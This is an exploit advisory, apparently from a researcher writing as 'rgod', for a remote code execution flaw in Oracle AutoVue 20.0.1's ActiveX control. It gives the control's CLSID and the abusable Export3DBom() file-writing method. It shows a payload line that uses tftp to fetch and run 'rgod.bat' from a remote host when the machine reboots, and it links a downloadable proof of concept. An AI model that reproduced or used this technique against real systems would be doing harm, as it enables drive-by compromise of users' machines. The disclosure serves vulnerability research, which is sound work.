Oracle AutoVue 20.0.1 AutoVueX ActiveX Control Export3DBom Remote Code 
Execution Vulnerability

tested against: Internet Explorer 8
                Microsoft Windows Server 2003 r2 sp2

download url of a test version: 
http://www.oracle.com/technetwork/apps-tech/autovue/index.html

file:
AutoVueDemo2001.zip

Background:

the mentioned program installs an ActiveX control with the following
settings:

ProgID: AUTOVUEX.AutoVueXCtrl.1
CLSID: {B6FCC215-D303-11D1-BC6C-0000C078797F}
Binary path: C:\PROGRA~1\av\avwin\AutoVueX.ocx
Safe for initialization (registry): true
Safe for scripting (registry): true

This control is marked "safe for scripting" and "safe for initialization",
Internet Explorer will allows scripting of this control.

Vulnerability:

The mentioned class contains the vulnerable Export3DBom() method, from
the typelib:

...
	/* DISPID=108 */
	/* VT_BOOL [11] */
	function Export3DBom(
		/* VT_BSTR [8]  */ $sFileName 
		)
	{
	}
...

which allows to create / overwrite files with arbitrary extensions
inside arbitrary locations ex. automatic startup folders. 
By manipulating the argument of this method is possible to create 
a valid application with .cmd extension.

The resulting file will look like this (see 9sg_autovueii.html):


...
Count, Part Name
1,CALC.EXE 


Model Tree (With transformation information):
Entity Name,m[0][0],m[1][0],m[2][0],m[3][0],m[0][1],m[1][1],m[2][1],m[3][1],m[0][2],m[1][2],m[2][2],m[3][2],m[0][3],m[1][3],m[2][3],m[3][3]
CALC.EXE ,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000
...

Also I found a way to execute something useful for an attacker
by invoking the tftp binary (see 9sg_autovueiii.html),
the resulting file will look like this:

...
Count, Part Name
1,tftp 192.168.0.1 GET rgod rgod.bat & rgod.bat  


Model Tree (With transformation information):
Entity Name,m[0][0],m[1][0],m[2][0],m[3][0],m[0][1],m[1][1],m[2][1],m[3][1],m[0][2],m[1][2],m[2][2],m[3][2],m[0][3],m[1][3],m[2][3],m[3][3]
tftp 192.168.0.1 GET rgod rgod.bat & rgod.bat  ,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000,0.000000,0.000000,0.000000,0.000000,1.000000
...

which will retrieve another script at the next reboot.

poc:

http://retrogod.altervista.org/9sg_autovueii.zip

Modify the SRC parameter to point to the .SLDPRT files.

//rgod